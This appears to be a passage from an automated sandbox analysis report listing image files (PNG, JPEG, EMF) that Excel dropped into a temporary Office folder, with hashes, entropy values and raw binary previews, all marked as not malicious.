Preview:	......JFIF..............Exif..MM.......@......../..@..................C...........................$ &%# #"(-90(6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================......{...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\35493F6.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	84203
Entropy (8bit):	7.979766688932294
Encrypted:	false
SSDEEP:	1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
MD5:	208FD40D2F72D9AED77A86A44782E9E2
SHA1:	216B99E777ED782BDC3BFD1075DB90DFDDABD20F
SHA-256:	CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
SHA-512:	7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u\|0a.....].R.z...2......GJY\|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..\|...=.\|K...w...}O..{\|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..\|j.....b.r7.O!F...c'......$...)....\|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}\|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq\|.0...e.v......17...:F

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\382BCCC6.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	7788
Entropy (8bit):	5.533196327083454
Encrypted:	false
SSDEEP:	96:wMX6CblJaXn/08zDefAm/luoOHo6MiDbDda91RjTBbPxmPAWmOHX:wOjTNAK4oOIGbK1RvVwPAWmOHX
MD5:	1F2B5AACC9C5B04A836533E30B3A31F3
SHA1:	18374AF46557DCAE4A34CC6CA4B7F8CAA59934F5
SHA-256:	0407CDBEA25671B4478D8E9502F556385A2D0A076947E5BECFBC88A27DCC23DB
SHA-512:	4879FAA99D08FD8569DE1887FDDC023CAB1C28DC75B0D2CE6E65FC07A381B7D8DA63D7C47A78E7B5C4D1DC9D7EFCBA456094DFBED34F96358124DE6192CE7368
Malicious:	false
Preview:	....l...).......u...<.........../....... EMF....l...........................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I.....................................................6.).X...0...d.....................o...o...p....\.....o.......o.l.o...p......o.<5.u..p....`.pHx..$y.w............(.o....w....$.....8.d.........o..^.p.....^.p8..............-...T.o..<.w................<.9u.Z.v....X.\....Hx.........................vdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .........................................................................................................................................................................................................................................HD?^KHCcNJFfOJFiQMHlSPJoUPLrWRMvYSPx[UR{]XQ~^XS._ZT.a[U.c\U.e^V.e^X.g`Y.hbY.jaZ.jb\.ld].ld].nd^.nf^.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3A9AFE9C.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
Category:	dropped
Size (bytes):	8815
Entropy (8bit):	7.944898651451431
Encrypted:	false
SSDEEP:	192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
MD5:	F06432656347B7042C803FE58F4043E1
SHA1:	4BD52B10B24EADECA4B227969170C1D06626A639
SHA-256:	409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
SHA-512:	358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
Malicious:	false
Preview:	......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T..K..\|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3D45ADF5.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
Category:	dropped
Size (bytes):	14198
Entropy (8bit):	7.916688725116637
Encrypted:	false
SSDEEP:	384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
MD5:	E8FC908D33C78AAAD1D06E865FC9F9B0
SHA1:	72CA86D260330FC32246D28349C07933E427065D
SHA-256:	7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
SHA-512:	A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
Malicious:	false
Preview:	......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...\|5.2.....%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......\|j.4.mn..Ke!G.6PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.\|..10........... ..l..\|F...E9...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4D264A0F.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
Category:	dropped
Size (bytes):	85020
Entropy (8bit):	7.2472785111025875
Encrypted:	false
SSDEEP:	768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
MD5:	738BDB90A9D8929A5FB2D06775F3336F
SHA1:	6A92C54218BFBEF83371E825D6B68D4F896C0DCE
SHA-256:	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
SHA-512:	48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
Malicious:	false
Preview:	......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\67EABCC4.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
Category:	dropped
Size (bytes):	8815
Entropy (8bit):	7.944898651451431
Encrypted:	false
SSDEEP:	192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
MD5:	F06432656347B7042C803FE58F4043E1
SHA1:	4BD52B10B24EADECA4B227969170C1D06626A639
SHA-256:	409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
SHA-512:	358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
Malicious:	false
Preview:	......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T..K..\|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\78100EDE.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	84203
Entropy (8bit):	7.979766688932294
Encrypted:	false
SSDEEP:	1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
MD5:	208FD40D2F72D9AED77A86A44782E9E2
SHA1:	216B99E777ED782BDC3BFD1075DB90DFDDABD20F
SHA-256:	CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
SHA-512:	7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
Malicious:	false
Preview:	.PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u\|0a.....].R.z...2......GJY\|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..\|...=.\|K...w...}O..{\|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..\|j.....b.r7.O!F...c'......$...)....\|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}\|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq\|.0...e.v......17...:F

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7FF60B83.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	6815
Entropy (8bit):	7.871668067811304
Encrypted:	false
SSDEEP:	96:pJzjDc7s5VhrOxAUp8Yy5196FOMVsoKZkl3p1NdBzYPx7yQgtCPe1NSMjRP9:ppDc7sk98YM19SC/27QptgtCPWkUl
MD5:	E2267BEF7933F02C009EAEFC464EB83D
SHA1:	ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE
SHA-256:	BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
SHA-512:	AB1C3C23B5533C5A755CCA7FF6D8B8111577ED2823224E2E821DD517BC4E6D2B6E1353B1AFEAC6DB570A8CA1365F82CA24D5E1155C50B12556A1DF25373620FF
Malicious:	false
Preview:	.PNG........IHDR...e...P.....X.......sBIT.....O.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>....IDATx^..tT....?.$.(.C..@.Ah.Z4.g...5[Vzv.v[9.=..KOkkw......(v.b..kYJ[.]...U...T$....!.....3....y3y....$.d....y..{....}....{.{..._6p#.. .. .. ..H(......I..H..H..H..4..c.l.E.B.$@.$@.$@.$0.........O[.9e......7......"''g.Da.$@.$@.$@.$0v.x.^....{..=...3..a0\7.\|...5())...}<vIQs. .. .. .....K>].........3..K.[.nE..Q..E............._2.k...4l.)........p............eK..S..[w^..YX...4.\]]]....w.....H..H..H...E`.)..*n.\...Sw.?..O..LM...H..`F$@.$@.$@.$.4..Nv.Hh...OV......9..(.........@..L..<..ef&..;.S..=..MifD.$@.$@.$@.N#.1i..D...qO.S.....rY.oc...\|.-..X./.].].rm.V<..l..U.q>v.1.G.}h+Z"...S..r.X..S.#x...FokVv.L.&.....8. 9.3m.6@.p..8.#...\|.RiNY.+.b...E.W.8^..o....;'..\.}........\|F.8V....x.8^~.>\..S....o..j.....m..I.....B.ZN....6\b.G...X.5....Or!...m.6@......yL.>.!R.\. ...._.....7..G.i.e.......9..r..[F.r.....P4.e.k.{..@].......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8E3548CB.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	6815
Entropy (8bit):	7.871668067811304
Encrypted:	false
SSDEEP:	96:pJzjDc7s5VhrOxAUp8Yy5196FOMVsoKZkl3p1NdBzYPx7yQgtCPe1NSMjRP9:ppDc7sk98YM19SC/27QptgtCPWkUl
MD5:	E2267BEF7933F02C009EAEFC464EB83D
SHA1:	ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE
SHA-256:	BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
SHA-512:	AB1C3C23B5533C5A755CCA7FF6D8B8111577ED2823224E2E821DD517BC4E6D2B6E1353B1AFEAC6DB570A8CA1365F82CA24D5E1155C50B12556A1DF25373620FF
Malicious:	false
Preview:	.PNG........IHDR...e...P.....X.......sBIT.....O.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>....IDATx^..tT....?.$.(.C..@.Ah.Z4.g...5[Vzv.v[9.=..KOkkw......(v.b..kYJ[.]...U...T$....!.....3....y3y....$.d....y..{....}....{.{..._6p#.. .. .. ..H(......I..H..H..H..4..c.l.E.B.$@.$@.$@.$0.........O[.9e......7......"''g.Da.$@.$@.$@.$0v.x.^....{..=...3..a0\7.\|...5())...}<vIQs. .. .. .....K>].........3..K.[.nE..Q..E............._2.k...4l.)........p............eK..S..[w^..YX...4.\]]]....w.....H..H..H...E`.)..*n.\...Sw.?..O..LM...H..`F$@.$@.$@.$.4..Nv.Hh...OV......9..(.........@..L..<..ef&..;.S..=..MifD.$@.$@.$@.N#.1i..D...qO.S.....rY.oc...\|.-..X./.].].rm.V<..l..U.q>v.1.G.}h+Z"...S..r.X..S.#x...FokVv.L.&.....8. 9.3m.6@.p..8.#...\|.RiNY.+.b...E.W.8^..o....;'..\.}........\|F.8V....x.8^~.>\..S....o..j.....m..I.....B.ZN....6\b.G...X.5....Or!...m.6@......yL.>.!R.\. ...._.....7..G.i.e.......9..r..[F.r.....P4.e.k.{..@].......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8F889450.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	33795
Entropy (8bit):	7.909466841535462
Encrypted:	false
SSDEEP:	768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
MD5:	613C306C3CC7C3367595D71BEECD5DE4
SHA1:	CB5E280A2B1F4F1650040842BACC9D3DF916275E
SHA-256:	A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
SHA-512:	FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
Malicious:	false
Preview:	.PNG........IHDR..............T+....)iCCPicc..x..gP......}..m....T).HYz.^E...Y."bC..D..i. ...Q).+.X...X.,....."(.G.L.{'?..z.w.93..".........~....06\|G$/3........Q@.......%:&.......K....\............JJ.. ........@n..3./...f._>..L~...... ......{..T.\|ABlL..?-V...ag.......>.......W..@..+..pHK..O.....o....................w..F.......,...{....3......].xY..2....( .L..EP.-..c0.+..'p.o..P..<....C....(.........Z...B7\.kp...}..g .)x.......!"t... J.:...#...qB<.?$..@.T$..Gv"%H9R.4 -.O....r..F. ..,.'...P..D.P....\...@.qh.....{...=.v....(*D...`T..)cz..s...0,..c[.b..k..^l.{...9.3..c..8=........2p[q....I\.....7...}....x].%...........f\|'..~.?..H .X.M.9...JH$l&....:.W..I...H.!......H..XD.&."^!.....HT....L.#...H..V.e..i..D.#..-...h.&r....K.G."/Q.)..kJ.%...REi...S.S.T.....@.N.....NP?.$h:4.Z8-...v.v.....N.k...at.}/..~....I.!./.&.-.M.V.KdD.(YT].+.A4O.R...=.91.....X..V.Z..bcb...q#qo...R.V...3.D...'.h.B.c..%&..C....1v2..7.SL.S...Ld.0O3.....&.A......$.,...rc%..XgY.X_....R1R{..F.....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\988D15ED.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
Category:	dropped
Size (bytes):	14198
Entropy (8bit):	7.916688725116637
Encrypted:	false
SSDEEP:	384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
MD5:	E8FC908D33C78AAAD1D06E865FC9F9B0
SHA1:	72CA86D260330FC32246D28349C07933E427065D
SHA-256:	7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
SHA-512:	A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
Malicious:	false
Preview:	......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...\|5.2.....%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......\|j.4.mn..Ke!G.6PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.\|..10........... ..l..\|F...E9...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A7DFC7A8.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	33795
Entropy (8bit):	7.909466841535462
Encrypted:	false
SSDEEP:	768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
MD5:	613C306C3CC7C3367595D71BEECD5DE4
SHA1:	CB5E280A2B1F4F1650040842BACC9D3DF916275E
SHA-256:	A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
SHA-512:	FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
Malicious:	false
Preview:	.PNG........IHDR..............T+....)iCCPicc..x..gP......}..m....T).HYz.^E...Y."bC..D..i. ...Q).+.X...X.,....."(.G.L.{'?..z.w.93..".........~....06\|G$/3........Q@.......%:&.......K....\............JJ.. ........@n..3./...f._>..L~...... ......{..T.\|ABlL..?-V...ag.......>.......W..@..+..pHK..O.....o....................w..F.......,...{....3......].xY..2....( .L..EP.-..c0.+..'p.o..P..<....C....(.........Z...B7\.kp...}..g .)x.......!"t... J.:...#...qB<.?$..@.T$..Gv"%H9R.4 -.O....r..F. ..,.'...P..D.P....\...@.qh.....{...=.v....(*D...`T..)cz..s...0,..c[.b..k..^l.{...9.3..c..8=........2p[q....I\.....7...}....x].%...........f\|'..~.?..H .X.M.9...JH$l&....:.W..I...H.!......H..XD.&."^!.....HT....L.#...H..V.e..i..D.#..-...h.&r....K.G."/Q.)..kJ.%...REi...S.S.T.....@.N.....NP?.$h:4.Z8-...v.v.....N.k...at.}/..~....I.!./.&.-.M.V.KdD.(YT].+.A4O.R...=.91.....X..V.Z..bcb...q#qo...R.V...3.D...'.h.B.c..%&..C....1v2..7.SL.S...Ld.0O3.....&.A......$.,...rc%..XgY.X_....R1R{..F.....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DCC67372.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	49744
Entropy (8bit):	7.99056926749243
Encrypted:	true
SSDEEP:	768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
MD5:	63A6CB15B2B8ECD64F1158F5C8FBDCC8
SHA1:	8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
SHA-256:	AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
SHA-512:	BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
Malicious:	false
Preview:	.PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..\|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$.......kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........\|i ..."....V.g.\.G..p..p.X[.....%hyt...@..J...~.p.....\|..>...~.`..E_....iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w..y..\|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.\|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EA784B99.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	648132
Entropy (8bit):	2.812379565083531
Encrypted:	false
SSDEEP:	3072:434UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:C4UcLe0JOcXuunhqcS
MD5:	31BA65BE1FB493107F7F598925CE6CC5
SHA1:	D732A62C6A995EED0D5CBF4E8BD8CB774BE2BA02
SHA-256:	02DF6DD93E56D18723A9A865B0877D0A440A156050DF91B7B81CD8288B94D504
SHA-512:	D0CFDF82446BC4587D6881F29D8B3198F87486F094B416EC7B7EDD68BE735E8BBE344EF1A6598AA97F688234578B83D03069D91B69FE59EAB957DCB4F13D3070
Malicious:	false
Preview:	....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................X$...,...-z.X.@..%.......L...........0....NVZ.....................NVZ........ ....y.X........ .........r..z.X........................................%...X...%...7...................{$..................C.a.l.i.b.r.i...........<...X.................r....vdv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+@..$..........?...........?.........@...........@..........@..$..........?....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F26B3547.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
Category:	dropped
Size (bytes):	85020
Entropy (8bit):	7.2472785111025875
Encrypted:	false
SSDEEP:	768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
MD5:	738BDB90A9D8929A5FB2D06775F3336F
SHA1:	6A92C54218BFBEF83371E825D6B68D4F896C0DCE
SHA-256:	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
SHA-512:	48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
Malicious:	false
